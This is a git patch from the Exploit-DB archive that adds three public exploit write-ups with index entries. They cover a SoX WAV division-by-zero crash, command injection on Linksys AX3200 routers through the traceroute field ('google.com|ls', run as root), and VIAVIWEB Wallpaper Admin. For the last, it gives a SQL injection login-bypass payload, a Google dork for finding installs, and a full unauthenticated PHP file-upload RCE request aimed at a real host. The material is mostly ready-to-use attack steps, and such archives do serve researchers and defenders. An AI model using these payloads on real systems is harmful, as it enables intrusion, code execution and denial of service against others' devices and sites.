From 6206f4f20893f64c4556027331dc7ccf18d96c4f Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 23 Mar 2023 00:16:30 +0000 Subject: [PATCH] DB: 2023-03-23 4 changes to exploits/shellcodes/ghdb SoX 14.4.2 - Denial Of Service Linksys AX3200 V1.1.00 - Command Injection VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities --- exploits/hardware/dos/51034.txt | 77 +++++++++++++++++++++++++++++ exploits/hardware/webapps/51035.txt | 16 ++++++ exploits/php/webapps/51033.txt | 69 ++++++++++++++++++++++++++ files_exploits.csv | 3 ++ 4 files changed, 165 insertions(+) create mode 100644 exploits/hardware/dos/51034.txt create mode 100644 exploits/hardware/webapps/51035.txt create mode 100644 exploits/php/webapps/51033.txt diff --git a/exploits/hardware/dos/51034.txt b/exploits/hardware/dos/51034.txt new file mode 100644 index 000000000..3f19c8149 --- /dev/null +++ b/exploits/hardware/dos/51034.txt @@ -0,0 +1,77 @@ +# Exploit Title: SoX 14.4.2 - Denial Of Service +# Exploit Author: LiquidWorm + + +Vendor: Chris Bagwell +Product web page: http://sox.sourceforge.net + https://en.wikipedia.org/wiki/SoX +Affected version: <=14.4.2 + +Summary: SoX (Sound eXchange) is the Swiss Army knife of sound processing +tools: it can convert sound files between many different file formats and +audio devices, and can apply many sound effects and transformations, as well +as doing basic analysis and providing input to more capable analysis and +plotting tools. + +Desc: SoX suffers from a division by zero attack when handling WAV files, +resulting in denial of service vulnerability and possibly loss of data. + +Tested on: Ubuntu 18.04.6 LTS + Microsoft Windows 10 Home + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5712 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5712.php + +CWE ID: 369 +CWE URL: https://cwe.mitre.org/data/definitions/369.html + + +05.09.2022 + +-- + + +PoC: + +https://zeroscience.mk/codes/sox_div0.wav.zip + +--- + +$ ./sox div0.wav test.wav reverse +Floating point exception (core dumped) +... +Program received signal SIGFPE, Arithmetic exception. +0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950 +(gdb) bt +#0 0x00005555556a560d in startread (ft=ft@entry=0x5555559a54a0) at wav.c:950 +#1 0x000055555558dcc2 in open_read (path=, buffer=, buffer_size=, signal=0x5555559a5140, encoding=, filetype=0x555555777621 "wav") + at formats.c:545 +#2 0x0000555555561480 in main (argc=3, argv=0x7fffffffde18) at sox.c:2945 +... +Program received signal SIGFPE, Arithmetic exception. +0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 +1457 blocksWritten = MS_UNSPEC/wBlockAlign; +(gdb) bt +#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 +#1 startwrite (ft=0x5555559a6a90) at wav.c:1252 +#2 0x0000555555591669 in open_write (path=, buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0, + signal=, encoding=, filetype=, oob=, overwrite_permitted=) at formats.c:912 +#3 0x0000555555593913 in sox_open_write (path=, signal=, encoding=, filetype=, oob=, overwrite_permitted=) + at formats.c:948 +#4 0x000055555556b620 in open_output_file () at sox.c:1557 +#5 process () at sox.c:1754 +#6 main (argc=, argv=) at sox.c:3008 +(gdb) bt full +#0 0x00005555556a3a32 in wavwritehdr (second_header=0, ft=0x5555559a6a90) at wav.c:1457 + wFormatTag = 1 + dwAvgBytesPerSec = 0 + dwFactSize = 4 + bytespersample = + blocksWritten = + dwSamplesWritten = 0 +... \ No newline at end of file diff --git a/exploits/hardware/webapps/51035.txt b/exploits/hardware/webapps/51035.txt new file mode 100644 index 000000000..00c6afd36 --- /dev/null +++ b/exploits/hardware/webapps/51035.txt @@ -0,0 +1,16 @@ +# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection +# Date: 2022-09-19 +# Exploit Author: Ahmed Alroky +# Author: Linksys +# Version: 1.1.00 +# Authentication Required: YES +# CVE : CVE-2022-38841 + +# Tested on: Windows + +# Proof Of Concept: + +1 - login into AX3200 webui +2 - go to diagnostics page +3 - put "google.com|ls" to perform a traceroute +4 - you will get the file list and also you can try "example.com|id" to ensure that all commands executed as a root user \ No newline at end of file diff --git a/exploits/php/webapps/51033.txt b/exploits/php/webapps/51033.txt new file mode 100644 index 000000000..a2101fc50 --- /dev/null +++ b/exploits/php/webapps/51033.txt @@ -0,0 +1,69 @@ +# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities +# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username" +# Date: [18/09/2022] +# Exploit Author: [Edd13Mora] +# Vendor Homepage: [www.viaviweb.com] +# Version: [N/A] +# Tested on: [Windows 11 - Kali Linux] + +------------------ +SQLI on the Login page +------------------ +payload --> admin' or 1=1-- - +--- +POC: +--- +[1] Disable JavaScript on ur browser put the payload and submit +[2] Reactive JavaScript and resend the request +--------------------------- +Authenticated SQL Injection: +--------------------------- +Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number] +----------------------------------------------- +Remote Code Execution (RCE none authenticated): +----------------------------------------------- +Poc: +---- +Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes +-------------------- +Burp Request : +-------------------- + +POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2 +Host: http://googlezik.freehostia.com +Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848 +Content-Length: 467 +Origin: http://googlezik.freehostia.com +Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +-----------------------------33893919268150571572221367848 +Content-Disposition: form-data; name="category_id" + +1 +-----------------------------33893919268150571572221367848 +Content-Disposition: form-data; name="image[]"; filename="poc.php" +Content-Type: image/png + + +-----------------------------33893919268150571572221367848 +Content-Disposition: form-data; name="submit" + + +-----------------------------33893919268150571572221367848-- + + +Uploaded File can be found here : +-------------------------------- +http://localhost/PAth-Where-Script-Installed/categories/ +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c094b8f1d..62f992a32 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3165,6 +3165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25711,exploits/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer - Malformed File Name Handling Denial of Service",2005-05-26,"Marek Bialoglowy",dos,hardware,,2005-05-26,2013-05-26,1,,,,,,https://www.securityfocus.com/bid/13782/info 44197,exploits/hardware/dos/44197.md,"Sony Playstation 4 (PS4) 5.01 < 5.05 - WebKit Code Execution (PoC)",2018-02-27,ALEXZZZ9,dos,hardware,,2018-02-28,2018-04-25,0,,Console,,http://www.exploit-db.com/screenshots/idlt44500/screenshot.png,,https://github.com/ALEXZZZ9/PS4-5.01-WebKit-Exploit-PoC/tree/bf295a89c4f78164275c024710540662e0bce83b 1473,exploits/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - Reset Display Denial of Service",2006-02-06,"Pierre Betouin",dos,hardware,,2006-02-05,,1,OSVDB-23055;CVE-2006-0671,,,,, +51034,exploits/hardware/dos/51034.txt,"SoX 14.4.2 - Denial Of Service",2023-03-22,LiquidWorm,dos,hardware,,2023-03-22,2023-03-22,0,,,,,, 46261,exploits/hardware/dos/46261.sh,"Sricam gSOAP 2.8 - Denial of Service",2019-01-28,"Andrew Watson",dos,hardware,5000,2019-01-28,2019-01-28,0,CVE-2019-6973,"Denial of Service (DoS)",,,, 28228,exploits/hardware/dos/28228.txt,"Sunbelt Kerio Personal Firewall 4.3.426 - CreateRemoteThread Denial of Service",2006-07-15,"David Matousek",dos,hardware,,2006-07-15,2013-09-17,1,CVE-2006-3787;OSVDB-27337,,,,,https://www.securityfocus.com/bid/18996/info 40687,exploits/hardware/dos/40687.txt,"SunellSecurity NVR / Camera - Denial of Service",2016-11-02,qwsj,dos,hardware,,2016-11-02,2016-11-09,0,,,,,, @@ -4431,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34163,exploits/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,webapps,hardware,,2014-07-24,2014-07-24,0,OSVDB-109522;OSVDB-109521;OSVDB-109520;OSVDB-109519;OSVDB-109518,,,,, 40690,exploits/hardware/webapps/40690.txt,"LifeSize Room 5.0.9 - Multiple Vulnerabilities",2016-11-02,"Xiphos Research Ltd",webapps,hardware,,2016-11-02,2016-11-02,0,,,,,,https://github.com/XiphosResearch/exploits/tree/master/deathsize 47649,exploits/hardware/webapps/47649.py,"Linear eMerge E3 1.00-06 - Remote Code Execution",2019-11-13,LiquidWorm,webapps,hardware,,2019-11-13,2019-11-13,0,,,,,, +51035,exploits/hardware/webapps/51035.txt,"Linksys AX3200 V1.1.00 - Command Injection",2023-03-22,"Ahmed Alroky",webapps,hardware,,2023-03-22,2023-03-22,0,CVE-2022-38841,,,,, 24475,exploits/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,webapps,hardware,,2013-02-11,2013-02-11,1,OSVDB-89916;OSVDB-89915;OSVDB-89914;OSVDB-89913;OSVDB-89912;OSVDB-89911;CVE-2013-2678,,,http://www.exploit-db.com/screenshots/idlt24500/screen-shot-2013-02-11-at-110220-am.png,,http://www.s3cur1ty.de/m1adv2013-004 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,,2021-03-25,2021-03-25,0,CVE-2012-6708,,,,, 49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,,2020-12-17,2020-12-17,0,,,,,, @@ -31181,6 +31183,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,, 41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,, 41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php,,2017-02-12,2017-02-12,0,,,,,, +51033,exploits/php/webapps/51033.txt,"VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities",2023-03-22,Edd13Mora,webapps,php,,2023-03-22,2023-03-22,0,,,,,, 6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,webapps,php,,2008-11-03,,1,OSVDB-54277;CVE-2008-6795,,,,, 6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,webapps,php,,2008-11-03,2016-12-30,1,OSVDB-54277;CVE-2008-6795,,,,, 36081,exploits/php/webapps/36081.txt,"VicBlog - 'tag' SQL Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49304/info